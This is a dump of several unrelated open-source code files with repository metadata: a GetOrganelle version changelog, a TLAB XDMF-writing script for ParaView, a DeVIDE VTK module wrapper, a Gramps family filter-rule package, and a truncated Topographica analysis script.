"1. fix a minor bug when raising ProcessingGraphFailed with # tags",
"2. setup.py install modified",
"3. open() modified",
]},
{"number": "1.6.2a",
"features": [
"1. the bug with option \"--genes\" fixed",
"2. the bug with \"Mixing iteration and read methods\" introduced by 1.6.2 fixed",
]},
{"number": "1.6.2",
"features": [
"1. get_organelle_from_reads.py: --reduce-reads-for-cov/estimate_maximum_n_reads_using_mapping() added; "
" problem with pre_assembly_mapped_reads_for_base_cov() fixed; "
" better target-hitting base coverage estimation",
"2. get_organelle_from_assembly.py: fix a bug on parsing gfa file with long seq head names; "
" --keep-temp fixed; fix a bug with '-h'; ",
"3. Utilities/slim_fastg.py: --no-merge -> --merge; disable merge by default",
"4. GetOrganelleLib/assembly_parser.py: fix a bug with generating new vertices, "
" as well as merge_all_possible_contigs; export plastome-LSC direction according to convention based on "
" accumulated orf lengths (the conventional reverse direction has more accumulated orf lengths), which "
" makes users easier to use; remove processing_polymorphism() before filter_by_coverage() to better "
" cluster organelle contigs by coverages",
"5. blastn GLIBC_2.14 not found problem fixed",
"6. '-F embplant_pt' does not remove embplant_mt-hitting contigs, which makes more accurate clustering",
]},
{"number": "1.6.1a",
"features": [
"1. GetOrganelleLib/SeedDatabase: embplant_pt updated. ",
]},
{"number": "1.6.1",
"features": [
"1. GetOrganelleLib/SeedDatabase: updated with repeats removed. "
" save computational time and generate better target-hitting base coverage estimation.",
]},
{"number": "1.6.0",
"features": [
"1. setup.py added with new installation way.",
"2. GetOrganelleDep added for easier dependencies installation",
"3. get_organelle_reads.py -> get_organelle_from_reads.py;"
" --max-extending-len, --ex-genes, --which-blast, --which-bowtie2, --which-spades, --zip-files added; "
"multi-organelle mode supported; add support for fq head @digits; "
"--safe,-r,--auto-wss,--soft-max-n-words etc removed; --flush-step modified (background mode); "
"4. get_organelle_from_assembly.py (basically slim + disentangle) added",
"5. Library/SeqReference -> GetOrganelleLib/SeedDatabase",
"6. Library/NotationReference -> GetOrganelleLib/LabelDatabase",
"7. plant_mt -> embplant_mt; plant_nr -> embplant_nr; plant_pt -> embplant_pt; other_pt added;",
"8. assembly_parser.py: keep terminal contigs if --linear; fix a bug when --acyclic-allowed; "
"optimized for self-loop contigs",
"9. Utilities/evaluate_assembly_using_mapping.py: log statistics without --draw",
"10. Utilities/disentangle_organelle_assembly.py: --acyclic-allowed -> --linear",
"11. Utilities/slim_fastg.py: --no-merge added",
]},
{"number": "1.5.2a",
"features": [
"1. more descriptive log",
]},
{"number": "1.5.2",
"features": [
"1. get_organelle_reads.py: Bowtie2 index files written to sample output directory rather than "
" to GetOrganelle/Library/SeqReference",
"2. get_organelle_reads.py: more descriptive log",
"3. seq_parser.py: re_linear_circular_seqs: fix a bug for evaluating the assembly result of DR plastomes",
"4. evaluate_assembly_using_mapping.py: bowtie2-build --seed",
]},
{"number": "1.5.1c",
"features": [
"1. --random-seed added with default value 12345",
"2. wider suggested/default k-mer values",
"3. get_organelle_reads.py: exit after illegal -F",
"4. evaluate_assembly_using_mapping.py: customized error rate info added",
"5. evaluate_assembly_using_mapping.py: robust to illegitimate usage of duplicated seq names in fasta",
"6. evaluate_assembly_using_mapping.py: fix a bug when no aligned bases found",
"7. sam_parser.py: keep redundant cigar chars",
"8. README.md: toolkit",
"9. evaluate_assembly_using_mapping.py: re-linearize circular sequence before mapping",
"10. plastome_arch_info.py: added",
]},
{"number": "1.5.1b",
"features": [
"1. get_organelle_reads.py: value of mesh size should have effect on --out-per-round (fix a bug since 1.4.2)",
]},
{"number": "1.5.1a",
"features": [
"1. get_organelle_reads.py: from math import inf is not compatible with Python2; -R default set to 1000",
"2. pipe_control_func.py: MEM_TRANS, influence summary_get_organelle_output.py",
]},
{"number": "1.5.1",
"features": [
"1. fix a bug in get_organelle_reads.py: pre_grouping(): generate_forward_and_reverse()",
"2. fix a bug in evaluate_assembly_using_mapping.py: --debug",
]},
{"number": "1.5.0h",
"features": [
"1. re-organize importing codes",
"2. minimum of -R: 2 -> 1",
"3. slim_fastg.py: remove default -F",
"4. round_statistics.py: increase significant digits",
]},
{"number": "1.5.0g",
"features": [
"1.get_organelle_reads.py: fix a bug in --out-per-round & --min-quality-score, chop_seqs -> chop_seq_list",
"2.get_organelle_reads.py: expand user-defined word size scope, 49 -> 29 (AUTO_MIN_WS, GLOBAL_MIN_WS)",
"3.README.md: updated",
]},
{"number": "1.5.0f",
"features": [
"1.disentangle: more instructive log.",
"2.Set default logging level of round_statistics.py and evaluate_assembly_using_mapping.py to INFO",
"3.round_statistics.py: set larger value to max_cov_tick",
]},
{"number": "1.5.0e",
"features": [
"1.get_organelle_reads.py: --continue skip disentangling when *.gfa & *.fasta",
]},
{"number": "1.5.0d",
"features": [
"1.disentangle: parallel contigs remained; --contamination-depth",
"2.seq_parser.py: find_string_dif adjusted",
]},
{"number": "1.5.0c",
"features": [
"1.evaluate_assembly_using_mapping.py & sam_parser.py: mapped reads counted; echo bug correctly",
]},
{"number": "1.5.0b",
"features": [
"1.evaluate_assembly_using_mapping.py: --debug added",
"2.slim_fastg.py: compatible with older python version"
]},
{"number": "1.5.0a",
"features": [
"1.evaluate_assembly_using_mapping.py: modifying the layout; plot options added",
]},
{"number": "1.5.0",
"features": [
"1.evaluate_assembly_using_mapping.py added",
]},
{"number": "1.5.0-pre2",
"features": [
"-F anonym added",
"-F fungus_mt added",
"-F animal_mt added but not activated",
"re-estimate base coverage by counting seed word frequencies if the result (directly from sam) < 200",
"fix a bug for logging base-coverage when no kmer detected from graph",
"fix a bug of --continue",
]},
{"number": "1.5.0-pre",
"features": [
"cp -> plant_pt; mt -> plant_mt; nr -> plant_nr; for adding animals",
"Comparison url (https://github.com/Kinggerm/GetOrganelleComparison) added",
]},
{"number": "1.4.4b",
"features": [
"1.assembly_parser.py: fix a bug for disentangling single-contig graph; remove redundant 'repeat_pattern';",
]},
{"number": "1.4.4a",
"features": [
"time limit works only for disentangling graph as a circular genome",
"more informative log info for disentangling",
]},
{"number": "1.4.4",
"features": [
"1.get_organelle_reads.py: fix a bug with --continue & --prefix when LogInfo() added; ",
"2.assembly_parser.py & statistical_func.py: "
"if single copy vertex percentage is < 50%, continue dropping suspicious vertices",
"3.pip_control_func.py: for --prefix",
]},
{"number": "1.4.3a",
"features": [
"1.get_organelle_reads.py: check_kmers() modified; ",
"2.pipe_control_func.py: LogInfo() modified",
]},
{"number": "1.4.3",
"features": [
"1.get_organelle_reads.py: output renamed; fix a bug of logging",
"2.summary_get_organelle_output.py: added",
]},
{"number": "1.4.3-beta",
"features": [
"1.get_organelle_reads.py: a bug in logging seed reads; moving re-setting kmers after extending;",
"2.disentangle_organelle_assembly.py & assembly_parser.py: "
"2a.'--acyclic-allowed' activated; "
"2b.'--continue' added; "
"2c.better output for polymorphyism-contained graph, default degenerate similarity threshold increased, "
" print warning when degenerate base used; "
"2d.find_target_graph(broken_graph_allowed)",
"4.pip_control_func.py: LogInfo added",
"5.NotationReference: cp updated"
]},
{"number": "1.4.2",
"features": [
"1.get_organelle_reads.py: better seed fastq file log; "
" increase the default values of jump_step and mesh_size",
"2.assembly_parser.py: fix a bug in filter_by_coverage().",
"3.disentangle_organelle_assembly.py: '--acyclic-allowed' added (not activated yet)",
"4.statistical_func.py: fix a bug in assign_cluster_labels",
"5.join_spades_fastg_by_blast.py: signs of gap and overlap",
"6.SeqReference/cp.fasta: source id specified",
]},
{"number": "1.4.1a",
"features": [
"1.get_organelle_reads.py: '--no-pre-reading' added",
]},
{"number": "1.4.1",
"features": [
"1.assembly_parser.py: Assembly.export_path() and Assembly.merge_all_possible_vertices():"
" name of merged vertices optimized",
"2.README: PATH configuration",
"3.mk_batch_for_iteratively_mapping_assembling.py: -t threads",
"4.get_organelle_reads.py --fast mode modified",
"5.sam_parser.py added: for 1.5.0",
]},
{"number": "1.4.0j",
"features": [
"1.default values (--max-n-words & --auto-wss) set to make GetOrganelle perform like older versions",
]},
{"number": "1.4.0i",
"features": [
"1.empirically reduce maximum word size",
"2.report SPAdes failed when not output folder exist.",
]},
{"number": "1.4.0h",
"features": [
"1.fix a bug: calling slim_fastg.py failed.",
]},
{"number": "1.4.0g",
"features": [
"1.slim_fastg.py: fix the import error when using python2.*",
"2.README.md: in case of HTTP request failed",
]},
{"number": "1.4.0f",
"features": [
"1.parse_gfa() added to Library/assembly_parser.py",
"2.get_organelle_reads.py -h",
]},
{"number": "1.4.0e",
"features": [
"1.print python version",
"2.gfa2fastg.py modified, gfa2fasta.py added, fastg2gfa.py added",
]},
{"number": "1.4.0d",
"features": [
"1.some default values adjusted.",
"2.slim_fastg.py: '--depth-threshold' -> '--min-depth'&'--max-depth'",
"3.print python version"
"4.gfa2fastg.py modified, gfa2fasta.py added, fastg2gfa.py added"
]},
{"number": "1.4.0c",
"features": [
"1.'--pre-w' added mainly for reproducing results when word size changes during reads extending process.",
]},
{"number": "1.4.0b",
"features": [
"1.--max-reads also works for mapping now, which would do better in target coverage estimation.",
]},
{"number": "1.4.0a",
"features": [
"1.default reference seq set as Library/SeqReference/*.fasta.",
]},
{"number": "1.4.0",
"features": [
"1.estimate_word_size() added.",
"2.auto_word_size_step (--auto-wss, --soft-max-words, -r) added.",
"3.mean_error_rate added.",
"4.options re-organized and introductions optimized: '-h' versus '--help'.",
"5.Utilities/mk_get_organelle.py recognize *.gz files.",
"6.change the default setting of --max-n-words"
]},
{"number": "1.3.1",
"features": [
"1.'--max-discard-percent' added to prevent discarding too much data.",
"2.fix the bug in get_low_quality_char_pattern, which causes misidentification for quality encoding format.",
"3.--flush-frequency added",
"4.better log info",
"5.'--overwrite' -> '--no-overwrite' in slim_fastg.py"
]},
{"number": "1.3.0d",
"features": [
"1.continue to process assembly results based on available kmers if SPAdes failed at one of the planned kmers",
]},
{"number": "1.3.0c",
"features": [
"1.fix a bug: compatibility with '--continue' option of SPAdes",
]},
{"number": "1.3.0b",
"features": [
"1.fix a bug for exporting organelle",
]},
{"number": "1.3.0a",
"features": [
"1.automatically discard improper input kmers",
]},
{"number": "1.3.0",
"features": [
"1.Read quality control (--min-quality-score) added.",
"2.--trim option removed.",
"3.fix a bug on word size estimation",
]},
{"number": "1.2.0d",
"features": [
"1.Add --max-words.",
]},
{"number": "1.2.0c",
"features": [
"1.Go over assemblies based on all kmer values, from large to small, until the solvable assembly is found.",
"2.overwrite option added for slim_fastg.py",
"3.Optimize the log",
"4.multiprocessing function added (planed, not utilized yet)",
]},
{"number": "1.2.0b",
"features": [
"1.Assembly.parse_fastg(): (more robust) Add connection information to both of the related vertices"
" even it is only mentioned once;",
"2.Assembly.is_sequential_repeat(): fix a bug that leak in the reverse direction;",
"3.add depth_factor to the main script;",
"4.remove unnecessary warning when #read equals maximum#reads setting, show warning only when overrunning;",
]},
{"number": "1.2.0a",
"features": [
"1.set time limit for disentangling",
]},
{"number": "1.2.0",
"features": [
"1.more robust and precise in disentangling graph: ",
"2.report contamination; ",
"3.detect parallel contigs and generate consensus;",
"4.estimate chloroplast coverage distribution pattern using weighted GMM with EM and BIC;",
"5.re-organize codes",
"6.update NotationReference",
]},
{"number": "1.1.0d",
"features": [
"1.more precise in disentangling graph.",
"2.--prefix added",
]},
{"number": "1.1.0c",
"features": [
"1.--max-reads: default=10,000,000 for cp and nr, default=50,000,000 for mt",
]},
{"number": "1.1.0b",
"features": [
"1.'-w' could be followed with a ratio of word_size to average_read_length now",
]},
{"number": "1.1.0a",
"features": [
"1.Add options-maximum_number_of_reads with default=10,000,000 to avoid unnecessary overloading",
]},
{"number": "1.1.0",
"features": [
"1.automatically exporting final sequence(s)",
"2.adding disentangle_organelle_assembly.py",
"3.adding assembly_parser.py",
"4.re-organize codes",
"5.revise README.md",
]},
{"number": "1.0.5",
"features": [
"1.re-organize codes",
]},
{"number": "1.0.4",
"features": [
"1.support fq head with @XXXX.XXXX.X",
"2.automatically skip empty fq files for spades",
]},
{"number": "1.0.3a",
"features": [
"1.gunzip",
]},
{"number": "1.0.3",
"features": [
"1.accept .gz/.zip files as input",
"2.logging errors as utf8",
]},
{"number": "1.0.2a",
"features": [
"1.prompt failure in Utilities/slim_fastg.py",
]},
{"number": "1.0.2",
"features": [
"1.removing duplicates become a parameter to control the memory usage.",
]},
{"number": "1.0.1a",
"features": [
"1.Fix the bug of running spades.py with --continue when no output file exists.",
]},
{"number": "1.0.1",
"features": [
"1.Add default reference (Library/SeqReference).",
]}
]
| Kinggerm/GetOrganelle | GetOrganelleLib/versions.py | Python | gpl-3.0 | 31,892 | [
"BLAST"
] | 93f859fb4d5191267d79c9baec1852b5ab55c681829c791244a104daf8f8dc3b |
#!/usr/bin/python3
import numpy as np # For array operations.
import sys

nx = 0 # number of points in Ox; if 0, then search dns.ini
ny = 0 # number of points in Oy; if 0, then search dns.ini
nz = 0 # number of points in Oz; if 0, then search dns.ini

sizeofmask = 6  # number of trailing digits in the iteration counter of filenames

# do not edit below this line

def _grid_points(key, current):
    """Return `current` if non-zero, else the integer value of `key=` in dns.ini.

    Matching is case-insensitive and ignores blanks, mirroring the dns.ini
    conventions.  Returns 0 if the key is not found.
    """
    if current != 0:
        return current
    # `with` ensures the ini file handle is closed (the previous version
    # opened the file three times and never closed it).
    with open('dns.ini') as ini:
        for line in ini:
            if line.lower().replace(" ", "").startswith(key + "="):
                return int(line.split("=", 1)[1])
    return 0

# getting grid size from dns.ini, if necessary
nx = _grid_points("imax", nx)
ny = _grid_points("jmax", ny)
nz = _grid_points("kmax", nz)

print("Grid size is {}x{}x{}.".format(nx, ny, nz))
def itnumber(filename):
    """Sort key: the iteration counter encoded in the last `sizeofmask`
    characters of the file stem (the part before the first dot)."""
    stem = filename.split(".", 1)[0]
    start = len(stem) - sizeofmask
    return int(stem[start:len(stem)])
# Command-line sanity check: at least one data file is required.
if len(sys.argv) == 1:
    print("Usage: python %s list-of-files." % sys.argv[0])
    sys.exit()

# Sort the input files by their iteration counter.
filenames = sorted(sys.argv[1:], key=itnumber)

# Split each file stem into a field name (prefix) and an iteration tag
# (the last `sizeofmask` characters), collecting the unique values of each
# while preserving encounter order.
# NOTE: the previous code tested `any(type in s for s in filetypes)`, a
# substring match, which wrongly dropped a field whose name is contained
# in an already-seen field name; exact membership is used instead.
filetypes = []
filetimes = []
for name in filenames:
    stem = name.split(".", 1)[0]
    fieldname = stem[:len(stem) - sizeofmask]
    if fieldname not in filetypes:
        filetypes.append(fieldname)
    timetag = stem[len(stem) - sizeofmask:len(stem)]
    if timetag not in filetimes:
        filetimes.append(timetag)

print("Processing %d times in fields %s..." % (len(filetimes), ', '.join(filetypes)))
# Open the single XDMF index file; visualization tools (e.g. ParaView) read
# this descriptor and pull the raw binary grid/field files from disk.
f = open('main'+'.times.xdmf', 'w')

# Definining entities depending on planesmode
f.write('''<?xml version="1.0" ?>
<!--
XDMF file to read time collections of plane data from TLAB into a data analysis and visualization application, like ParaView.
Add simply data items after the geometry block to read different files.
The structure of this file has been adapted from psOpen, from Jens Henrik Goebbert.
-->
<!DOCTYPE Xdmf SYSTEM "Xdmf.dtd" [
''')

# Dataset and hyperslab dimensions; the hyperslab here covers the full grid.
data = ( nx,ny,nz, nx,ny,nz )
f.write('''
<!-- dimension of complete datasets -->
<!ENTITY DimsX "%d">
<!ENTITY DimsY "%d">
<!ENTITY DimsZ "%d">
<!-- dimension of hyperslab to load -->
<!ENTITY HSDimsX "%d">
<!ENTITY HSDimsY "%d">
<!ENTITY HSDimsZ "%d">
<!-- start of hyperslab in complete dataset -->
<!ENTITY HSDimsX_Start "0">
<!ENTITY HSDimsY_Start "0">
<!ENTITY HSDimsZ_Start "0">
<!-- stride of hyperslab in complete dataset -->
<!ENTITY HSStrideX "1">
<!ENTITY HSStrideY "1">
<!ENTITY HSStrideZ "1">
<!-- data precision (grid is always 8 bytes) -->
<!ENTITY Prec "4">
''' % data )

# Byte offsets of the y- and z-grid blocks inside the TLAB grid file:
# 56-byte header, then each block is Dim*8 bytes of doubles plus 8 bytes.
data = (56+nx*8+8, 56+nx*8+8+ny*8+8)
f.write('''
<!-- offsets to grid blocks -->
<!ENTITY SeekGridX "56">
<!ENTITY SeekGridY "%d"> <!-- + DimX*8 + 8-->
<!ENTITY SeekGridZ "%d"> <!-- + DimY*8 + 8-->
<!-- offsets to data -->
<!ENTITY SeekData "0"> <!-- No header -->
<!-- <!ENTITY SeekData "52"> --> <!-- Tlab header -->
<!-- <!ENTITY SeekData "244"> --> <!-- Ensight header -->
''' % data )

# code below is independent of filetype
# Shared topology/geometry, referenced by every timeslice below.
f.write('''
]>
<Xdmf xmlns:xi="http://www.w3.org/2001/XInclude" Version="2.0">
  <Domain Name="main">
    <!-- Hyperslab metadata referenced below -->
    <DataItem Name="HSMetaData" Dimensions="3 3" Format="XML">
      &HSDimsZ_Start; &HSDimsY_Start; &HSDimsX_Start;
      &HSStrideZ; &HSStrideY; &HSStrideX;
      &HSDimsZ; &HSDimsY; &HSDimsX;
    </DataItem>
    <!-- Defining common topology and common grid to all timeslices -->
    <Topology TopologyType="3DRectMesh" Dimensions="&HSDimsZ; &HSDimsY; &HSDimsX;">
    </Topology>
    <Geometry GeometryType="VXVYVZ">
      <DataItem Name="X" ItemType="HyperSlab" Dimensions="&HSDimsX;">
        <DataItem Dimensions="1 3" Format="XML">
          &HSDimsX_Start;
          &HSStrideX;
          &HSDimsX;
        </DataItem>
        <DataItem ItemType="Uniform" Format="Binary" Seek="&SeekGridX;" NumberType="Float" Precision="8" Endian="Little" Dimensions="&DimsX;">
          grid
        </DataItem>
      </DataItem>
      <DataItem Name="Y" ItemType="HyperSlab" Dimensions="&HSDimsY;">
        <DataItem Dimensions="1 3" Format="XML">
          &HSDimsY_Start;
          &HSStrideY;
          &HSDimsY;
        </DataItem>
        <DataItem ItemType="Uniform" Format="Binary" Seek="&SeekGridY;" NumberType="Float" Precision="8" Endian="Little" Dimensions="&DimsY;">
          grid
        </DataItem>
      </DataItem>
      <DataItem Name="Z" ItemType="HyperSlab" Dimensions="&HSDimsZ;">
        <DataItem Dimensions="1 3" Format="XML">
          &HSDimsZ_Start;
          &HSStrideZ;
          &HSDimsZ;
        </DataItem>
        <DataItem ItemType="Uniform" Format="Binary" Seek="&SeekGridZ;" NumberType="Float" Precision="8" Endian="Little" Dimensions="&DimsZ;">
          grid
        </DataItem>
      </DataItem>
    </Geometry>
    <!-- Collection of timeslices -->
    <Grid GridType="Collection" CollectionType="Temporal">
      <Time TimeType="HyperSlab">
        <DataItem Format="XML" NumberType="Float" Dimensions="3"> <!-- start, stride, count-->
          0.0 1.0 %d;
        </DataItem>
      </Time>
''' % (len(filetimes)) )

# Loop over timeslices
for time in filetimes:
    f.write('''
    <!-- Timeslice -->
    <Grid Name="It%d" GridType="Uniform">
      <Topology Reference="/Xdmf/Domain/Topology[1]"/>
      <Geometry Reference="/Xdmf/Domain/Geometry[1]"/>
''' % (int(time)) )
    # One Attribute block per field type present at this timeslice.
    for type in filetypes:
        # Vector fields are stored as three scalar component files
        # (suffixes .1/.2/.3), joined into one XDMF Vector attribute.
        if ( type in ['VelocityVector','VorticityVector'] ):
            f.write('''
      <Attribute AttributeType="Vector" Name="%s">
        <DataItem ItemType="Function" Function="JOIN($0,$1,$2)" Dimensions="&HSDimsZ; &HSDimsY; &HSDimsX; 3">
          <DataItem ItemType="HyperSlab" Dimensions="&HSDimsZ; &HSDimsY; &HSDimsX;">
            <DataItem Reference="/Xdmf/Domain/DataItem[1]"/>
            <DataItem ItemType="Uniform" Format="Binary" Seek="&SeekData;" NumberType="Float" Precision="4" Endian="Little" Dimensions="&DimsZ; &DimsY; &DimsX;">
              %s
            </DataItem>
          </DataItem>
          <DataItem ItemType="HyperSlab" Dimensions="&HSDimsZ; &HSDimsY; &HSDimsX;">
            <DataItem Reference="/Xdmf/Domain/DataItem[1]"/>
            <DataItem ItemType="Uniform" Format="Binary" Seek="&SeekData;" NumberType="Float" Precision="4" Endian="Little" Dimensions="&DimsZ; &DimsY; &DimsX;">
              %s
            </DataItem>
          </DataItem>
          <DataItem ItemType="HyperSlab" Dimensions="&HSDimsZ; &HSDimsY; &HSDimsX;">
            <DataItem Reference="/Xdmf/Domain/DataItem[1]"/>
            <DataItem ItemType="Uniform" Format="Binary" Seek="&SeekData;" NumberType="Float" Precision="4" Endian="Little" Dimensions="&DimsZ; &DimsY; &DimsX;">
              %s
            </DataItem>
          </DataItem>
        </DataItem>
      </Attribute>
''' % (type, type+time+'.1',type+time+'.2',type+time+'.3') )
        # Symmetric tensors are stored as six component files; note the
        # JOIN order (1,4,5,2,6,3).
        # NOTE(review): this order maps TLAB component storage onto the
        # XDMF Tensor6 layout -- confirm against the TLAB output convention.
        elif ( type in ['StrainTensor','ReynoldsTensor'] ):
            f.write('''
      <Attribute AttributeType="Tensor6" Name="%s">
        <DataItem ItemType="Function" Function="JOIN($0,$1,$2,$3,$4,$5)" Dimensions="&HSDimsZ; &HSDimsY; &HSDimsX; 6">
          <DataItem ItemType="HyperSlab" Dimensions="&HSDimsZ; &HSDimsY; &HSDimsX;">
            <DataItem Reference="/Xdmf/Domain/DataItem[1]"/>
            <DataItem ItemType="Uniform" Format="Binary" Seek="&SeekData;" NumberType="Float" Precision="4" Endian="Little" Dimensions="&DimsZ; &DimsY; &DimsX;">
              %s
            </DataItem>
          </DataItem>
          <DataItem ItemType="HyperSlab" Dimensions="&HSDimsZ; &HSDimsY; &HSDimsX;">
            <DataItem Reference="/Xdmf/Domain/DataItem[1]"/>
            <DataItem ItemType="Uniform" Format="Binary" Seek="&SeekData;" NumberType="Float" Precision="4" Endian="Little" Dimensions="&DimsZ; &DimsY; &DimsX;">
              %s
            </DataItem>
          </DataItem>
          <DataItem ItemType="HyperSlab" Dimensions="&HSDimsZ; &HSDimsY; &HSDimsX;">
            <DataItem Reference="/Xdmf/Domain/DataItem[1]"/>
            <DataItem ItemType="Uniform" Format="Binary" Seek="&SeekData;" NumberType="Float" Precision="4" Endian="Little" Dimensions="&DimsZ; &DimsY; &DimsX;">
              %s
            </DataItem>
          </DataItem>
          <DataItem ItemType="HyperSlab" Dimensions="&HSDimsZ; &HSDimsY; &HSDimsX;">
            <DataItem Reference="/Xdmf/Domain/DataItem[1]"/>
            <DataItem ItemType="Uniform" Format="Binary" Seek="&SeekData;" NumberType="Float" Precision="4" Endian="Little" Dimensions="&DimsZ; &DimsY; &DimsX;">
              %s
            </DataItem>
          </DataItem>
          <DataItem ItemType="HyperSlab" Dimensions="&HSDimsZ; &HSDimsY; &HSDimsX;">
            <DataItem Reference="/Xdmf/Domain/DataItem[1]"/>
            <DataItem ItemType="Uniform" Format="Binary" Seek="&SeekData;" NumberType="Float" Precision="4" Endian="Little" Dimensions="&DimsZ; &DimsY; &DimsX;">
              %s
            </DataItem>
          </DataItem>
          <DataItem ItemType="HyperSlab" Dimensions="&HSDimsZ; &HSDimsY; &HSDimsX;">
            <DataItem Reference="/Xdmf/Domain/DataItem[1]"/>
            <DataItem ItemType="Uniform" Format="Binary" Seek="&SeekData;" NumberType="Float" Precision="4" Endian="Little" Dimensions="&DimsZ; &DimsY; &DimsX;">
              %s
            </DataItem>
          </DataItem>
        </DataItem>
      </Attribute>
''' % (type, type+time+'.1',type+time+'.4',type+time+'.5', type+time+'.2',type+time+'.6',type+time+'.3') )
        # Everything else: one scalar file per field and time step.
        else:
            f.write('''
      <Attribute Center="Node" Name="%s">
        <DataItem ItemType="HyperSlab" Dimensions="&HSDimsZ; &HSDimsY; &HSDimsX;">
          <DataItem Reference="/Xdmf/Domain/DataItem[1]"/>
          <DataItem ItemType="Uniform" Format="Binary" Seek="&SeekData;" NumberType="Float" Precision="&Prec;" Endian="Little" Dimensions="&DimsZ; &DimsY; &DimsX;">
            %s
          </DataItem>
        </DataItem>
      </Attribute>
''' % (type,type+time) )
    # Close this timeslice's grid element.
    f.write('''
    </Grid>
''' )

# End the xmf file
f.write('''
    </Grid> <!-- End of time collection -->
  </Domain>
</Xdmf>
''')

f.close()
| zrick/tlab | scripts/python/xdmf.py | Python | gpl-3.0 | 9,712 | [
"ParaView"
] | 0a8a91d2b5f11be4e296a10dd041cbec3e2d6c0fa365b736c22086c6129d9818 |
# class generated by DeVIDE::createDeVIDEModuleFromVTKObject
from module_kits.vtk_kit.mixins import SimpleVTKClassModuleBase
import vtk

class vtkStreamPoints(SimpleVTKClassModuleBase):
    """DeVIDE module wrapping VTK's vtkStreamPoints filter."""

    def __init__(self, module_manager):
        # Two vtkDataSet inputs, one vtkPolyData output.
        input_types = ('vtkDataSet', 'vtkDataSet')
        output_types = ('vtkPolyData',)
        SimpleVTKClassModuleBase.__init__(
            self,
            module_manager,
            vtk.vtkStreamPoints(),
            'Processing.',
            input_types,
            output_types,
            replaceDoc=True,
            inputFunctions=None,
            outputFunctions=None)
| nagyistoce/devide | modules/vtk_basic/vtkStreamPoints.py | Python | bsd-3-clause | 497 | [
"VTK"
] | 795e630317ede4a8f8259c245d546e6a68c9687a7da880fec83846ae27ec0ae8 |
#
# Gramps - a GTK+/GNOME based genealogy program
#
# Copyright (C) 2002-2007 Donald N. Allingham
# Copyright (C) 2007-2008 Brian G. Matherly
# Copyright (C) 2011 Tim G L Lyons
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
"""
Package providing filter rules for GRAMPS.
"""
from ._searchfathername import SearchFatherName
from ._searchmothername import SearchMotherName
from ._searchchildname import SearchChildName
from ._regexpfathername import RegExpFatherName
from ._regexpmothername import RegExpMotherName
from ._regexpchildname import RegExpChildName
from ._hasreltype import HasRelType
from ._allfamilies import AllFamilies
from ._hasgallery import HasGallery
from ._hasidof import HasIdOf
from ._haslds import HasLDS
from ._regexpidof import RegExpIdOf
from ._hasnote import HasNote
from ._hasnoteregexp import HasNoteRegexp
from ._hasnotematchingsubstringof import HasNoteMatchingSubstringOf
from ._hassourcecount import HasSourceCount
from ._hassourceof import HasSourceOf
from ._hasreferencecountof import HasReferenceCountOf
from ._hascitation import HasCitation
from ._familyprivate import FamilyPrivate
from ._hasattribute import HasAttribute
from ._hasevent import HasEvent
from ._isbookmarked import IsBookmarked
from ._matchesfilter import MatchesFilter
from ._matchessourceconfidence import MatchesSourceConfidence
from ._fatherhasnameof import FatherHasNameOf
from ._fatherhasidof import FatherHasIdOf
from ._motherhasnameof import MotherHasNameOf
from ._motherhasidof import MotherHasIdOf
from ._childhasnameof import ChildHasNameOf
from ._childhasidof import ChildHasIdOf
from ._changedsince import ChangedSince
from ._hastag import HasTag
from ._hastwins import HasTwins
from ._isancestorof import IsAncestorOf
from ._isdescendantof import IsDescendantOf
editor_rule_list = [
AllFamilies,
HasRelType,
HasGallery,
HasIdOf,
HasLDS,
HasNote,
RegExpIdOf,
HasNoteRegexp,
HasReferenceCountOf,
HasSourceCount,
HasSourceOf,
HasCitation,
FamilyPrivate,
HasEvent,
HasAttribute,
IsBookmarked,
MatchesFilter,
MatchesSourceConfidence,
FatherHasNameOf,
FatherHasIdOf,
MotherHasNameOf,
MotherHasIdOf,
ChildHasNameOf,
ChildHasIdOf,
ChangedSince,
HasTag,
HasTwins,
IsAncestorOf,
IsDescendantOf,
]
| beernarrd/gramps | gramps/gen/filters/rules/family/__init__.py | Python | gpl-2.0 | 2,993 | [
"Brian"
] | f9c8cb1af93c6b8cdf4399af5389be62a5bc2385dbab7ec961eccb0b813e1aaf |
import param
import topo.pattern
import topo.pattern.random
import __main__
import os
import contrib
import topo
from topo.transferfn.misc import PatternCombine
from topo.transferfn.misc import HalfRectify
from topo import numbergen
from topo.pattern import Gaussian
from topo.numbergen import UniformRandom, BoundedNumber, ExponentialDecay
from topo.command import pattern_present
from param import normalize_path
import numpy
from contrib.jacommands import LateralOrientationAnnisotropy
from topo.analysis.featureresponses import MeasureResponseCommand, FeatureMaps, SinusoidalMeasureResponseCommand, FeatureCurveCommand
FeatureMaps.num_orientation=16
MeasureResponseCommand.scale=1.0
MeasureResponseCommand.duration=4.0
SinusoidalMeasureResponseCommand.frequencies=[2.4]
FeatureCurveCommand.num_orientation=16
FeatureCurveCommand.curve_parameters=[{"contrast":15},{"contrast":50},{"contrast":90}]
from topo.command import load_snapshot
#load_snapshot('./DATA/LESI/TEST-small/CCSimple_000002.00.typ')
#load_snapshot('./DATA/LESI/TEST/CCSimple_000002.00.typ')
load_snapshot('./DATA/LESI/CCLESIGifLatest/CCSimple_010000.00.typ')
#load_snapshot('./DATA/LESI/CCLESIGif-NEW1/CCSimple_010000.00_with_map.typ')
#load_snapshot('./DATA/LESI/CCLESIGif12-Orig-LARGE_NEWEXPANDER5000/CCSimple_005002.00.typ')
from topo.command import wipe_out_activity, clear_event_queue
wipe_out_activity()
clear_event_queue()
from topo.pattern import SineGrating, Disk
class SineGratingDiskTemp(SineGrating):
mask_shape = param.Parameter(default=Disk(smoothing=0,size=1.0))
def new_set_parameters(a,b,c,d,e,f,g):
print a,b,c,d,e,f,g
topo.sim["LGNOn"].projections()["LateralGC"].strength=a
topo.sim["LGNOff"].projections()["LateralGC"].strength=a
def _divide_with_constant(x, y):
y = numpy.clip(y, 0, 10000)
x = numpy.clip(x, 0, 10000)
return numpy.divide(x, y + b)
topo.sim["LGNOn"].projections()["LateralGC"].activity_group = (0.6,_divide_with_constant)
topo.sim["V1Complex"].output_fns[1].t*=0
topo.sim["V1Complex"].output_fns[1].t+=c
